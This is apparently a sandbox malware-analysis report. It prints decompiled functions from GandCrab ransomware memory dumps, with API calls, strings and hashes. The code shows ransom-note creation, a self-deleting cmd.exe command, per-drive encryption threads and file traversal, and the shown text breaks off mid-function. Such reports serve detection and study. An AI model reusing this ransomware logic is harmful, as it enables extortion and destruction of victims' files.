			E0FBB5F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xfbc2a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0FBB9170( &_v267, 0, 0xff);
					E0FBB5DC0( &_v268, _t31, lstrlenA(_t31));
					E0FBB5E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

0x0fbb5f09
0x0fbb5f1b
0x0fbb5f1e
0x0fbb5f20
0x0fbb5f29
0x0fbb5f2d
0x0fbb5f38
0x0fbb5f40
0x0fbb5f49
0x0fbb5f6c
0x0fbb5f72
0x0fbb5f75
0x0fbb5f81
0x0fbb5f8b
0x0fbb5fa3
0x0fbb5fb3
0x0fbb5fc3
0x0fbb5fc3
0x0fbb5fd0

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0FBB5F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0FBB5F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32,74CB66A0), ref: 0FBB5F49
lstrlenA.KERNEL32(00000000), ref: 0FBB5F54
wsprintfA.USER32 ref: 0FBB5F6C
_memset.LIBCMT ref: 0FBB5F8B
lstrlenA.KERNEL32(00000000), ref: 0FBB5F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5FC3

Strings

ntdll.dll, xrefs: 0FBB5F33
RtlComputeCrc32, xrefs: 0FBB5F43
%Xeuropol, xrefs: 0FBB5F66

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 506d8631de177b466dd9b362789c3a08d22c7b1fd70c086d642ccf8bdabe6c7f
Instruction ID: a754c5c5811a2cfdf76fec65d155e65bed1cade5a6b3a51eaa75695767193501
Opcode Fuzzy Hash: 506d8631de177b466dd9b362789c3a08d22c7b1fd70c086d642ccf8bdabe6c7f
Instruction Fuzzy Hash: 31110335E40304BBD7205BA9BC49FFE7A6CAB05B11F0000A8F904A3181DAF859518E51

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB6D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xfbc2a64; // 0xfbc2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xfbc2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0fbb6d5b
0x0fbb6d63
0x0fbb6d85
0x0fbb6d8a
0x0fbb6d9e
0x0fbb6da5
0x0fbb6dbe
0x0fbb6dbe
0x0fbb6dc5
0x0fbb6dcb
0x0fbb6d8c
0x0fbb6d99
0x0fbb6d99
0x0fbb6dd8
0x0fbb6de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBB6E22,00000000,?,?), ref: 0FBB6D55
wsprintfW.USER32 ref: 0FBB6D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBB6D7F
GetLastError.KERNEL32(?,?), ref: 0FBB6D8C
lstrlenW.KERNEL32(0FBC2000,?,00000000,?,?), ref: 0FBB6DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0FBB6DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0FBB6DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBB6DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0FBB6D5D

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: cca2fb8f846d9931366544b6edd6ab217d4db67a00cd536d93d3f10ed58706c0
Instruction ID: 0f7e86711909d5e8b615e52d9ee24df22da60b5701771df093bca6276a2129c5
Opcode Fuzzy Hash: cca2fb8f846d9931366544b6edd6ab217d4db67a00cd536d93d3f10ed58706c0
Instruction Fuzzy Hash: F90180357402007BE2201B66AD8AFAA3B5CDB46B26F100164FF05A71C0DAE869268E69

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB5350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0fbb5376
0x0fbb537a
0x0fbb537e
0x0fbb5388
0x0fbb5390
0x0fbb5399
0x0fbb53b3
0x0fbb53b3
0x0fbb5390
0x0fbb53bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FBB54E9,00000000,?,?,?,?,0FBB5615,00000000,popkadurak,00000000), ref: 0FBB5366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0FBB5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5388
wsprintfW.USER32 ref: 0FBB5399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FBB53B3
ExitProcess.KERNEL32 ref: 0FBB53BB

Strings

cmd.exe, xrefs: 0FBB53A7
open, xrefs: 0FBB53AC
/c timeout -c 5 & del "%s" /f /q, xrefs: 0FBB5393

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 677d1ee6ecc2473ef5a502dd66999ca7ffd7f20ae95dd13b406950e2eabd8058
Instruction ID: fb14ffd16751583c81c1d3efc72646e13cd50f7df47993d919a34ae4de6100ff
Opcode Fuzzy Hash: 677d1ee6ecc2473ef5a502dd66999ca7ffd7f20ae95dd13b406950e2eabd8058
Instruction Fuzzy Hash: 88F03031BC171033F17116A62C1FFAB2D2C9B46F22F240048FB05BF1C289E464128EA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBB2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xfbbf290; // 0x21
				asm("movdqu xmm0, [0xfbbf280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0FBB2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0fbb2c59
0x0fbb2c5e
0x0fbb2c66
0x0fbb2c69
0x0fbb2c70
0x0fbb2c76
0x0fbb2c79
0x0fbb2ce9
0x0fbb2cf2
0x0fbb2d01
0x0fbb2c7b
0x0fbb2c7e
0x0fbb2c9f
0x0fbb2cbd
0x0fbb2ccb
0x0fbb2cd7
0x0fbb2c80
0x0fbb2c94
0x0fbb2c94
0x0fbb2c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0FBB2C8A
BeginPaint.USER32(?,?), ref: 0FBB2C9F
lstrlenW.KERNEL32(?), ref: 0FBB2CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0FBB2CBD
EndPaint.USER32(?,?), ref: 0FBB2CCB
CreateThread.KERNEL32 ref: 0FBB2CE9
DestroyWindow.USER32(?), ref: 0FBB2CF2

Strings

GandCrab!, xrefs: 0FBB2C5E

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: e22e25f28387d8426cda91171372309f870cd9c2c0830109fa5758eae7ff797b
Instruction ID: 1a1e9ba6c0a891d137912936916b451112147fffa96b96fd347b7d01f2d82606
Opcode Fuzzy Hash: e22e25f28387d8426cda91171372309f870cd9c2c0830109fa5758eae7ff797b
Instruction Fuzzy Hash: CB117932904209BBD711DF68EC0AFAA7BACEB49322F00461AFD4596190E7B199218F91

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB3FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBB3FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xfbbf350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0FBB6F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0FBB5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0fbb3ff6
0x0fbb4008
0x0fbb400c
0x0fbb4010
0x0fbb401b
0x0fbb401e
0x0fbb4020
0x0fbb4023
0x0fbb4028
0x0fbb402c
0x0fbb4031
0x0fbb403b
0x0fbb403f
0x0fbb4046
0x0fbb4050
0x0fbb4054
0x0fbb405a
0x0fbb4063
0x0fbb4072
0x0fbb4075
0x0fbb4082
0x0fbb4085
0x0fbb408b
0x0fbb4092
0x0fbb409f
0x0fbb40a3
0x0fbb40a4
0x0fbb40a4
0x0fbb40a7
0x0fbb40a8
0x0fbb40b6
0x0fbb40ba
0x0fbb40bd
0x0fbb40c7
0x0fbb40cf
0x0fbb40d5
0x0fbb40db
0x0fbb40e1
0x0fbb40eb
0x0fbb40f2
0x0fbb40f6
0x0fbb40fa
0x0fbb40fc
0x0fbb4104
0x0fbb410d
0x0fbb416c
0x0fbb4170
0x0fbb410f
0x0fbb410f
0x0fbb4112
0x0fbb4118
0x0fbb411f
0x0fbb4120
0x0fbb4127
0x0fbb412b
0x0fbb4130
0x0fbb4137
0x0fbb413a
0x0fbb413e
0x0fbb4148
0x0fbb414a
0x0fbb414e
0x0fbb4151
0x0fbb4154
0x0fbb4154
0x0fbb4154
0x0fbb415a
0x0fbb415e
0x0fbb4162
0x0fbb4166
0x0fbb4166
0x0fbb4176
0x0fbb419a
0x0fbb4178
0x0fbb4178
0x0fbb4182
0x0fbb4186
0x0fbb418d
0x0fbb41a4
0x0fbb41a8
0x0fbb41c6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0FBB4010
GetTickCount.KERNEL32 ref: 0FBB4035
GetDriveTypeW.KERNEL32(?), ref: 0FBB405A
CreateThread.KERNEL32 ref: 0FBB4099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0FBB40DB
GetTickCount.KERNEL32 ref: 0FBB40E1

Strings

?:\, xrefs: 0FBB4023

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 9be4fe6b355ead4bedc0e52337c5275161320b485aa4222fea4b472cc7494882
Instruction ID: 2b0476b76c41937ccad02b6723ab74c941f460f1e662eaeec19f243726ab03d3
Opcode Fuzzy Hash: 9be4fe6b355ead4bedc0e52337c5275161320b485aa4222fea4b472cc7494882
Instruction Fuzzy Hash: 195133709083009FC310CF19D884BAABBE5FF88325F504A5DEA899B391D3B5A944CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBB6F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0FBB6DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0fbb6f59
0x0fbb6f5f
0x0fbb6f6e
0x0fbb6f7c
0x0fbb6f90
0x0fbb6f98
0x0fbb6fa0
0x0fbb6fa8
0x0fbb6fb6
0x0fbb6fcb
0x0fbb6fdb
0x0fbb6fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0FBB6F59
wsprintfW.USER32 ref: 0FBB6F6E
InitializeCriticalSection.KERNEL32(?), ref: 0FBB6F7C
VirtualAlloc.KERNEL32 ref: 0FBB6FB0

Part of subcall function 0FBB6DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBB6E23
Part of subcall function 0FBB6DF0: lstrcatW.KERNEL32 ref: 0FBB6E3B
Part of subcall function 0FBB6DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBB6E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0FBB6FDB
ExitThread.KERNEL32 ref: 0FBB6FE3

Strings

%c:\, xrefs: 0FBB6F68

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: fb7152c015a3afb5dcfec2f8db37e8e32d708278aef47a4922f13d563408f030
Instruction ID: 68e65bdadf4d99958d3fc84170a2964def93cf3a5327fb5d58cf4880402f4290
Opcode Fuzzy Hash: fb7152c015a3afb5dcfec2f8db37e8e32d708278aef47a4922f13d563408f030
Instruction Fuzzy Hash: 620104B0544300BBE3109F11CC8AF163BACAB45B21F004614FF64AA1C0D7F89515CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB2890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0FBB2890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				void* _t18;
				void* _t23;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t34 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0FBB3030(0, _t34, _t35);
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0FBB3030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0);
					_v16 = _t18;
					if(_t18 != 0) {
						_t38 = MapViewOfFile(_t18, _t37, 0, 0, 0);
						if(_t38 != 0) {
							_t23 = E0FBB3030(0, _t34, _t38);
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6
								E0FBB8400(_t29, _t5);
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t28 = E0FBB2830(_v12, _t38, _v8);
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0fbb2890
0x0fbb2899
0x0fbb289b
0x0fbb28b1
0x0fbb28b6
0x0fbb28f9
0x0fbb2901
0x0fbb28b8
0x0fbb28c0
0x0fbb28c3
0x0fbb28ca
0x0fbb28cf
0x0fbb28d0
0x0fbb28d8
0x0fbb28e5
0x0fbb28eb
0x0fbb28f0
0x0fbb2910
0x0fbb2914
0x0fbb2916
0x0fbb291d
0x0fbb291f
0x0fbb2920
0x0fbb2920
0x0fbb2923
0x0fbb2926
0x0fbb292b
0x0fbb292b
0x0fbb292e
0x0fbb293f
0x0fbb2942
0x0fbb2942
0x0fbb2951
0x0fbb2954
0x0fbb295e
0x0fbb28f2
0x0fbb28f3
0x00000000
0x0fbb28f3
0x0fbb28f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,74CF82B0,00000000,?,?,0FBB2C02), ref: 0FBB28AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0FBB2C02), ref: 0FBB28BA
CreateFileMappingW.KERNEL32(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0FBB2C02), ref: 0FBB28E5
CloseHandle.KERNEL32(00000000,?,?,0FBB2C02), ref: 0FBB28F3
MapViewOfFile.KERNEL32(00000000,74CF82B1,00000000,00000000,00000000,?,?,0FBB2C02), ref: 0FBB290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0FBB2C02), ref: 0FBB2942
CloseHandle.KERNEL32(?,?,?,0FBB2C02), ref: 0FBB2951
CloseHandle.KERNEL32(00000000,?,?,0FBB2C02), ref: 0FBB2954

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: be56f93d32dc9d370badedbe8fad963b7d36d61d05bbcf9c361af418f63b5faa
Instruction ID: 4703dbd4876311039aa356628e8c0cdbeab2e7b7daed9a35e4ecd76402e214a6
Opcode Fuzzy Hash: be56f93d32dc9d370badedbe8fad963b7d36d61d05bbcf9c361af418f63b5faa
Instruction Fuzzy Hash: B4210771E002197FD7116B75AC85FBF77ACDB46665F4002A9FC05A3181D6B89C124DA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB69B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBB69B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xfbc2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xfbc2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
